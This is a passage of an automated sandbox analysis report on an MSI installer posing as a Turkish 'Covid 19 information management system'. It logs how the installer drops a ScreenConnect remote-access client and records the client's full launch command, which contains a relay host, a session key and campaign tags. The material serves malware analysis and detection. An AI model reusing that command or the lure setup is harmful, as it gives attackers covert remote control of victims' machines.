                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E395A4
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E38AC0
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 6_2_00007FFAEEF90F17
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 6_2_00007FFAEEF95D65
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 6_2_00007FFAEEF90F83
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 6_2_00007FFAEEF90F92
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 6_2_00007FFAEEFA0A83
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 6_2_00007FFAEEFA09A3
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFAEEF96051
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFAEEF90F17
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFAEEF90F83
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFAEEF90F92
                      Source: Covid 19 bilgi y#U00f6netim sistemi.msiBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll4 vs Covid 19 bilgi y#U00f6netim sistemi.msi
                      Source: Covid 19 bilgi y#U00f6netim sistemi.msiBinary or memory string: OriginalFilenameSfxCA.dllL vs Covid 19 bilgi y#U00f6netim sistemi.msi
                      Source: Covid 19 bilgi y#U00f6netim sistemi.msiBinary or memory string: OriginalFilenamewixca.dll\ vs Covid 19 bilgi y#U00f6netim sistemi.msi
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                      Source: 5.2.ScreenConnect.ClientService.exe.38b0000.5.unpack, ScreenConnect/BlockBufferStream.csCryptographic APIs: 'TransformBlock'
                      Source: 5.2.ScreenConnect.ClientService.exe.3ae0000.6.unpack, ScreenConnect/WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                      Source: 6.2.ScreenConnect.WindowsClient.exe.30b0000.3.unpack, ScreenConnect/BlockBufferStream.csCryptographic APIs: 'TransformBlock'
                      Source: 6.2.ScreenConnect.WindowsClient.exe.1bdf0000.4.unpack, ScreenConnect/WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                      Source: 6.2.ScreenConnect.WindowsClient.exe.1bdf0000.4.unpack, ScreenConnect/WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                      Source: 6.2.ScreenConnect.WindowsClient.exe.cf0000.0.unpack, ScreenConnect/Program.csSecurity API names: System.Void System.IO.Directory::SetAccessControl(System.String,System.Security.AccessControl.DirectorySecurity)
                      Source: 6.2.ScreenConnect.WindowsClient.exe.cf0000.0.unpack, ScreenConnect/Program.csSecurity API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                      Source: 5.2.ScreenConnect.ClientService.exe.4110000.10.unpack, ScreenConnect/Program.csSecurity API names: System.Void System.IO.Directory::SetAccessControl(System.String,System.Security.AccessControl.DirectorySecurity)
                      Source: 5.2.ScreenConnect.ClientService.exe.4110000.10.unpack, ScreenConnect/Program.csSecurity API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                      Source: 6.0.ScreenConnect.WindowsClient.exe.cf0000.0.unpack, ScreenConnect/Program.csSecurity API names: System.Void System.IO.Directory::SetAccessControl(System.String,System.Security.AccessControl.DirectorySecurity)
                      Source: 6.0.ScreenConnect.WindowsClient.exe.cf0000.0.unpack, ScreenConnect/Program.csSecurity API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                      Source: 5.2.ScreenConnect.ClientService.exe.3ae0000.6.unpack, ScreenConnect/WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                      Source: classification engineClassification label: mal60.spyw.evad.winMSI@24/15@2/3
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: StartServiceCtrlDispatcherW,VariantInit,OpenSCManagerW,OpenServiceW,GetCommandLineW,CreateServiceW,RegOpenKeyW,RegOpenKeyW,RegOpenKeyW,RegCreateKeyW,RegSetValueExW,QueryServiceStatus,QueryServiceStatus,StartServiceW,QueryServiceStatus,Sleep,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,VariantClear,VariantClear,
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E31880 StartServiceCtrlDispatcherW,VariantInit,OpenSCManagerW,OpenServiceW,GetCommandLineW,CreateServiceW,RegOpenKeyW,RegOpenKeyW,RegOpenKeyW,RegCreateKeyW,RegSetValueExW,QueryServiceStatus,QueryServiceStatus,StartServiceW,QueryServiceStatus,Sleep,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,VariantClear,VariantClear,
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E31880 StartServiceCtrlDispatcherW,VariantInit,OpenSCManagerW,OpenServiceW,GetCommandLineW,CreateServiceW,RegOpenKeyW,RegOpenKeyW,RegOpenKeyW,RegCreateKeyW,RegSetValueExW,QueryServiceStatus,QueryServiceStatus,StartServiceW,QueryServiceStatus,Sleep,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,VariantClear,VariantClear,
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.logJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2476:120:WilError_01
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIDAF2.tmpJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCommand line argument: GetServiceName
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCommand line argument: Service
                      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - Root\CIMV2 : select * from Win32_Processor
                      Source: C:\Windows\System32\msiexec.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\AppData\Local\Temp\MSIDAF2.tmp',zzzzInvokeManagedCustomActionOutOfProc SfxCA_6479046 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                      Source: Covid 19 bilgi y#U00f6netim sistemi.msiStatic file information: TRID: Microsoft Windows Installer (77509/1) 63.77%
                      Source: unknownProcess created: C:\Windows\System32\msiexec.exe 'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\Desktop\Covid 19 bilgi y#U00f6netim sistemi.msi'
                      Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 310E53CA954B87DDF133BB769ED24F52 C
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\AppData\Local\Temp\MSIDAF2.tmp',zzzzInvokeManagedCustomActionOutOfProc SfxCA_6479046 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                      Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 4286051B5CAEA5BC438DE69C35768ED1
                      Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6600E2C3A2980F238FD9D94A5368BBD9 E Global\MSI0000
                      Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exe 'C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exe' '?e=Access&y=Guest&h=instance-s6p2r4-relay.screenconnect.com&p=443&s=b49f7b4e-1f8e-4869-a774-7ac73425b6f9&k=BgIAAACkAABSU0ExAAgAAAEAAQAlGYhEPkxKLjcbpwfNZ%2bHR%2fKlTyh8C1eZxhmDq%2baJwQu0VExdNkYfU8P8vD7Y1ZlciHJizNXwnloBDvG1WWJc%2fIrWfX92vykYxqBgUI%2b4K3nOFaRgz3P4iujIXLKmSFuso0Nz%2f9QKAIGQ2FXaFykfYO2dzQQT3wK3Tf0snCYB0oDbSx4YwykdQiz5RcNZfnRkEpx9V%2fjHA1Ojf4Qy2Jy%2beBkU7baqCnkSPedSlHYXKd5Ntlcetv0j6hyn1m4yl%2fFPTTzSAOHcH9OFurBD8INMgbxBWfXp2iwBLbUhbM%2fwW8uAnf93bOrruAeNwCTfZiqQKKfPT0Gmm24qAeUeFxKjR&t=&c=gazete&c=gov.tr&c=tr&c=pc&c=&c=&c=&c='
                      Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exe 'C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exe' 'RunRole' '801dc3ab-dc2c-422e-ad1c-65e2ce12fcf0' 'User'
                      Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exe 'C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exe' 'RunRole' '68e7f305-6be0-44b6-9ef1-df08711f43e1' 'System'
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\AppData\Local\Temp\MSIDAF2.tmp',zzzzInvokeManagedCustomActionOutOfProc SfxCA_6479046 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exe 'C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exe' 'RunRole' '801dc3ab-dc2c-422e-ad1c-65e2ce12fcf0' 'User'
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exe 'C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exe' 'RunRole' '68e7f305-6be0-44b6-9ef1-df08711f43e1' 'System'
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                      Source: C:\Windows\System32\msiexec.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: Covid 19 bilgi y#U00f6netim sistemi.msiStatic file information: File size 1892352 > 1048576
                      Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.461665462.0000000000E3E000.00000002.00020000.sdmp
                      Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.2.dr
                      Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.2.dr
                      Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: Covid 19 bilgi y#U00f6netim sistemi.msi
                      Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: Covid 19 bilgi y#U00f6netim sistemi.msi

                      Data Obfuscation:

                      barindex
                      Binary contains a suspicious time stampShow sources
                      Source: initial sampleStatic PE information: 0xCD682783 [Thu Mar 16 01:18:59 2079 UTC]
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E31160 LoadLibraryW,GetProcAddress,CorBindToRuntimeEx,SysAllocString,SysFreeString,GetModuleHandleW,GetModuleFileNameW,PathRemoveExtensionW,PathFindFileNameW,StrCpyW,StrCpyW,StrCpyW,SafeArrayCreateVector,VariantClear,VariantClear,SysAllocString,SafeArrayPutElement,VariantClear,VariantInit,VariantInit,VariantInit,SysAllocString,SysFreeString,VariantClear,SysAllocString,SysFreeString,VariantClear,VariantClear,
                      Source: MSIDAF2.tmp.0.drStatic PE information: real checksum: 0x2f213 should be: 0x66bd6
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E326D5 push ecx; ret
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_041139A7 push es; retn 0006h
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 6_2_00007FFAEEFA0768 push es; retn 6002h
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 6_2_00007FFAEEF95DE8 push ebx; retn 5F5Eh
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 6_2_00007FFAEEF979DE push eax; retf
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 6_2_00007FFAEEF97935 pushad ; retf
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFAEEF95DE8 push ebx; retn 5F5Eh
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFAEEF979DE push eax; retf
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFAEEF97935 pushad ; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIDAF2.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIDAF2.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIDAF2.tmpJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIDAF2.tmp-\ScreenConnect.Core.dllJump to dropped file
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E31880 StartServiceCtrlDispatcherW,VariantInit,OpenSCManagerW,OpenServiceW,GetCommandLineW,CreateServiceW,RegOpenKeyW,RegOpenKeyW,RegOpenKeyW,RegCreateKeyW,RegSetValueExW,QueryServiceStatus,QueryServiceStatus,StartServiceW,QueryServiceStatus,Sleep,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,VariantClear,VariantClear,
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E3239D RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: C:\Windows\System32\msiexec.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
